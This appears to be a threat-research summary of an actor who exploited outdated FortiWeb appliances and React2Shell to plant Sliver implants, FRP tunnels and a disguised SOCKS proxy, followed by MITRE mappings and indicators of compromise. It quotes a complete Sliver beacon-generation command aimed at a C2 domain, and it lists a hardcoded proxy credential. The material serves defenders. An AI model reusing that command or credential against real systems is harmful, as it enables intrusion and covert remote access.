Threat Research

Where is the EDR? Silver C2 running from firewalls

Securonix
Where is the EDR? Silver C2 running from firewalls

Researchers discovered exposed Sliver C2 databases and logs in open directories, linking a threat actor that exploited multiple FortiWeb appliances and used React2Shell (CVE-2025-55182) to deploy Sliver and FRP to expose local services. Analysis shows Sliver implants, C2 domains, FRP and a renamed microsocks proxy (cups-lpd) persisted via systemd/supervisord on outdated FortiWeb devices, highlighting a major visibility blindspot. #Sliver #FortiWeb

Keypoints

  • Exposed Sliver C2 databases and logs were found in open directories indexed by Censys, revealing detailed operator activity and victim metadata.
  • The threat actor achieved initial access by exploiting public-facing vulnerabilities, notably using React2Shell (CVE-2025-55182) and multiple outdated FortiWeb appliances.
  • Multiple Sliver C2 domains (e.g., ns1.ubunutpackages[.]store, ns1.bafairforce[.]army) and implants with recorded SHA256 hashes and timestamps were recovered; 30 unique real hosts were onboarded in eight days.
  • Sliver implants were deployed to FortiWeb paths such as /bin/.root/system-updater (and one non-FortiWeb host at /app/web/system-updater), with victims across Bangladesh, Pakistan, the US and others.
  • Persistence was achieved via Systemd service files (updater.service, T1543.002) and modified supervisord configs; a renamed microsocks proxy (cups-lpd) exposed SOCKS on port 515 with hardcoded credentials.
  • The operator used Fast Reverse Proxy (frp) infrastructure (frps/frpc) hosted at 45.83.181[.]160 to proxy and expose internal victim services, corroborated by Sliver beacon databases.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – Initial access achieved via exploitation of public-facing vulnerabilities: ‘gained initial access via exploitation of public facing vulnerabilities’.
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Sliver used HTTP beacons to C2 as shown in the Sliver generate command: ‘generate beacon –http ns1.ubunutpackages.store –reconnect 120 –strategy r –template ubuntu –os linux –evasion –save ./system-updater –seconds 60’.
  • [T1543 ] Create or Modify System Process – The actor modified system process configurations to persist their tooling: ‘modification of system processes (T1543)’.
  • [T1543.002 ] Systemd Service – Persistence was implemented via a systemd service file for the updater binary: ‘Systemd Service (T1543.002)’.
  • [T1090 ] Proxy – The operator deployed proxying tooling to expose internal services remotely using FRP: ‘the Fast Reverse Proxy (frp) was leveraged’.
  • [T1036 ] Masquerading – The actor renamed and disguised a proxy binary to appear as a legitimate service (CUPS): ‘renamed microsocks binary (cups-lpd), bound to port 515 to masquearade as CUPs, running from a Systemd service on the FortiWeb appliance’.

Indicators of Compromise

  • [Domain ] Sliver C2 and decoy sites – ns1.ubunutpackages[.]store, ns1.bafairforce[.]army
  • [IP address ] C2 and FRP infrastructure – 195.20.17[.]253, 193.233.201[.]12, and 5 more IPs (e.g., 45.150.108[.]43, 80.78.18[.]142, 192.81.210[.]81, 45.143.167[.]7, 45.83.181[.]160)
  • [File hash (SHA256) ] Sliver implants and proxy binary – 2897ee24de4cca2a4c6a085cf6fdccb6a89c6c23978529d81b4f4e6db46b0b96, 4086057b9a0f9898c07318e093814ae9cfdaaf6ad71a45b2d0d4cd75e57f9354, and 4 more hashes.
  • [File name ] Deployed binaries and service files – /bin/.root/system-updater, cups_lpd (cups-lpd) and other service/config files (updater.service, supervisor.conf).
  • [URL ] FRP configuration and C2 endpoints – hXXp://45.83.181[.]160:8003/frpc.toml, https://ns1.ubunutpackages[.]store
  • [Credentials ] Hardcoded credential observed in proxy binary metadata – Monkhood6703:64d9cb9c5f075dfaa371a6f

Read more: https://ctrlaltintel.com/threat%20research/FortiWeb-Sliver/